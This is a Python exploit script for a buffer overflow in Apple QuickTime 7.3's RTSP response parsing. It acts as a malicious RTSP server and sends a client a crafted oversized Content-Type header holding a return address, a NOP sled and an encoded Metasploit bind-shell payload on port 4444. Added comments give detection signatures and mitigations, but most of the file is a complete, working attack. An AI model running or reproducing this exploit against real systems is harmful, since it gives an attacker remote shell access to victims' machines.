#!/usr/bin/python
# Apple QuickTime 7.3 RTSP Response Vista / XPSP2 Universal
# Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl>
# Edited by muts -> offensive-security.com
# http://www.offensive-security.com
#
# Tested on XP SP2 and Vista EN QuickTime/7.3
#


from socket import *  # wildcard import: pulls socket/AF_INET/SOCK_STREAM into the namespace (Python 2 script: see the print statements and raw_input below)

# RTSP response template. Two %-placeholders are filled in later (L95 below):
# the Content-Type value (the oversized field, marked "overflow" by the author)
# and Content-Length, which is set to the real length of `body`.
# Detection note: a legitimate Content-Type value is a short media type; this
# script sends one that is several kilobytes long (see the length arithmetic
# in the `tmp` build-up further down).
header = (
'RTSP/1.0 200 OK\r\n'
'CSeq: 1\r\n'
'Date: 0x00 :P\r\n'
'Content-Base: rtsp://0.0.0.0/1.mp3/\r\n'
'Content-Type: %s\r\n' # <-- overflow
'Content-Length: %d\r\n'
'\r\n')

# SDP session description sent as the response body. It is otherwise
# well-formed; its only role here is to give Content-Length a plausible value.
body = (
'v=0\r\n'
'o=- 16689332712 1 IN IP4 0.0.0.0\r\n'
's=MPEG-1 or 2 Audio, streamed by the PoC Exploit o.O\r\n'
'i=1.mp3\r\n'
't=0 0\r\n'
'a=tool:ciamciaramcia\r\n'
'a=type:broadcast\r\n'
'a=control:*\r\n'
'a=range:npt=0-213.077\r\n'
'a=x-qt-text-nam:MPEG-1 or 2 Audio, streamed by the PoC Exploit o.O\r\n'
'a=x-qt-text-inf:1.mp3\r\n'
'm=audio 0 RTP/AVP 14\r\n'
'c=IN IP4 0.0.0.0\r\n'
'a=control:track1\r\n'
)

# win32_bind -  EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com */

# Opaque, pre-generated payload bytes. The comment above identifies it as a
# Metasploit bind-shell payload listening on TCP 4444, alphanumeric-encoded
# (Alpha2), 696 bytes. Defender's view: an unexpected listener on TCP 4444
# appearing on a host right after it played an RTSP stream is the
# post-exploitation indicator for this payload; the Alpha2 encoding means the
# bytes on the wire look like printable ASCII rather than raw machine code.
shellcode =("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x48\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x69"
"\x58\x50\x30\x41\x31\x41\x42\x6b\x42\x41\x79\x32\x42\x42\x32\x41"
"\x41\x42\x30\x41\x41\x58\x38\x42\x42\x50\x75\x39\x79\x4b\x4c\x51"
"\x7a\x5a\x4b\x32\x6d\x38\x68\x48\x79\x4b\x4f\x6b\x4f\x4b\x4f\x75"
"\x30\x4e\x6b\x30\x6c\x36\x44\x56\x44\x4c\x4b\x57\x35\x77\x4c\x6e"
"\x6b\x41\x6c\x76\x65\x50\x78\x34\x41\x58\x6f\x4e\x6b\x70\x4f\x54"
"\x58\x6e\x6b\x33\x6f\x71\x30\x64\x41\x48\x6b\x43\x79\x6e\x6b\x67"
"\x44\x4e\x6b\x46\x61\x7a\x4e\x64\x71\x4f\x30\x7a\x39\x4c\x6c\x4b"
"\x34\x4b\x70\x50\x74\x57\x77\x48\x41\x79\x5a\x46\x6d\x66\x61\x6f"
"\x32\x48\x6b\x79\x64\x57\x4b\x36\x34\x45\x74\x34\x68\x74\x35\x4d"
"\x35\x4e\x6b\x71\x4f\x77\x54\x53\x31\x6a\x4b\x65\x36\x4c\x4b\x76"
"\x6c\x52\x6b\x4c\x4b\x33\x6f\x37\x6c\x75\x51\x5a\x4b\x47\x73\x34"
"\x6c\x4e\x6b\x4d\x59\x50\x6c\x44\x64\x75\x4c\x30\x61\x68\x43\x46"
"\x51\x6b\x6b\x62\x44\x6e\x6b\x70\x43\x74\x70\x6e\x6b\x71\x50\x66"
"\x6c\x4e\x6b\x32\x50\x57\x6c\x4e\x4d\x4c\x4b\x41\x50\x73\x38\x53"
"\x6e\x53\x58\x6c\x4e\x30\x4e\x64\x4e\x48\x6c\x76\x30\x4b\x4f\x6b"
"\x66\x35\x36\x50\x53\x43\x56\x43\x58\x57\x43\x30\x32\x51\x78\x53"
"\x47\x62\x53\x74\x72\x41\x4f\x41\x44\x4b\x4f\x6a\x70\x43\x58\x48"
"\x4b\x48\x6d\x4b\x4c\x35\x6b\x52\x70\x59\x6f\x38\x56\x41\x4f\x6d"
"\x59\x4a\x45\x61\x76\x4e\x61\x6a\x4d\x47\x78\x76\x62\x50\x55\x62"
"\x4a\x63\x32\x6b\x4f\x6e\x30\x61\x78\x4e\x39\x44\x49\x7a\x55\x4c"
"\x6d\x30\x57\x39\x6f\x4e\x36\x61\x43\x71\x43\x51\x43\x73\x63\x56"
"\x33\x73\x73\x66\x33\x73\x73\x61\x43\x79\x6f\x7a\x70\x70\x66\x65"
"\x38\x76\x71\x51\x4c\x43\x56\x36\x33\x4b\x39\x4a\x41\x4d\x45\x31"
"\x78\x39\x34\x47\x6a\x70\x70\x4a\x67\x33\x67\x6b\x4f\x4b\x66\x30"
"\x6a\x62\x30\x70\x51\x66\x35\x4b\x4f\x7a\x70\x35\x38\x4e\x44\x6e"
"\x4d\x54\x6e\x5a\x49\x66\x37\x49\x6f\x6b\x66\x73\x63\x70\x55\x6b"
"\x4f\x6a\x70\x65\x38\x5a\x45\x30\x49\x4d\x56\x47\x39\x31\x47\x39"
"\x6f\x4e\x36\x52\x70\x53\x64\x62\x74\x76\x35\x59\x6f\x58\x50\x4e"
"\x73\x61\x78\x6b\x57\x73\x49\x4b\x76\x43\x49\x63\x67\x4b\x4f\x59"
"\x46\x70\x55\x4b\x4f\x4a\x70\x50\x66\x72\x4a\x31\x74\x43\x56\x41"
"\x78\x50\x63\x62\x4d\x6f\x79\x48\x65\x33\x5a\x72\x70\x30\x59\x71"
"\x39\x68\x4c\x6d\x59\x48\x67\x61\x7a\x43\x74\x6d\x59\x4d\x32\x64"
"\x71\x4f\x30\x4c\x33\x4d\x7a\x4b\x4e\x51\x52\x36\x4d\x6b\x4e\x41"
"\x52\x64\x6c\x4a\x33\x6e\x6d\x31\x6a\x45\x68\x4e\x4b\x6e\x4b\x4e"
"\x4b\x61\x78\x44\x32\x49\x6e\x4c\x73\x66\x76\x39\x6f\x50\x75\x51"
"\x54\x49\x6f\x49\x46\x31\x4b\x31\x47\x70\x52\x46\x31\x70\x51\x46"
"\x31\x52\x4a\x47\x71\x43\x61\x62\x71\x53\x65\x36\x31\x79\x6f\x5a"
"\x70\x33\x58\x4c\x6d\x7a\x79\x45\x55\x6a\x6e\x76\x33\x59\x6f\x6a"
"\x76\x50\x6a\x4b\x4f\x79\x6f\x50\x37\x59\x6f\x7a\x70\x4c\x4b\x52"
"\x77\x4b\x4c\x4f\x73\x49\x54\x35\x34\x79\x6f\x6b\x66\x51\x42\x59"
"\x6f\x38\x50\x30\x68\x5a\x50\x4c\x4a\x66\x64\x51\x4f\x36\x33\x4b"
"\x4f\x78\x56\x6b\x4f\x38\x50\x69")


# Build the oversized Content-Type value. Layout, in order: 991 filler bytes,
# a 4-byte sequence, a hard-coded 4-byte constant (the inline comment gives
# its hex form), 64 x 0x90 (x86 NOP), the payload, then 'A' filler that pads
# the payload region to exactly 4028 bytes. The total is therefore fixed at
# 991 + 4 + 4 + 64 + 4028 = 5091 bytes whatever the payload length.
# Detection note: a ~5 KB Content-Type header consisting mostly of repeated
# 'A' and 0x90 bytes is a simple wire signature for this traffic.
tmp = "A" * 991
tmp+= "\xeb\x32\x90\x90"
tmp+= "\xC8\xF3\x86\x66" # 6686F3C8
tmp+= "\x90" * 64
tmp+= shellcode
tmp+= "\x41"* int(4028-len(shellcode))  # int() is redundant: both operands are already ints


# Fill the template: the crafted value goes into Content-Type, and
# Content-Length reflects the SDP body only (the header is not counted).
header %= (tmp, len(body))
evil = header + body

# Malicious-server (client-side) delivery: the victim must connect to this
# host on TCP 554 and parse the response. Listens on all interfaces, accepts a
# single connection, reads up to 1024 bytes of the client's request and then
# sends the crafted response unconditionally -- the request is never parsed or
# validated. Mitigation is on the client side: the header comment scopes this
# to QuickTime/7.3 on XP SP2 and Vista, so running a version newer than 7.3
# is the fix; on the network, blocking or inspecting outbound RTSP (554) to
# untrusted hosts limits exposure.
s = socket(AF_INET, SOCK_STREAM)
s.bind(("0.0.0.0", 554))  # needs privileges for a port below 1024 on most systems
s.listen(1)
print "[+] Listening on [RTSP] 554"
c, addr = s.accept()
print "[+] Connection accepted from: %s" % (addr[0])
data=c.recv(1024)  # client's request is read and discarded; `data` is unused

c.send(evil)  # single send(); no check that the whole buffer was written
raw_input("[+] Done, press enter to quit")  # keeps the connection open until the operator presses Enter
c.close()
s.close()
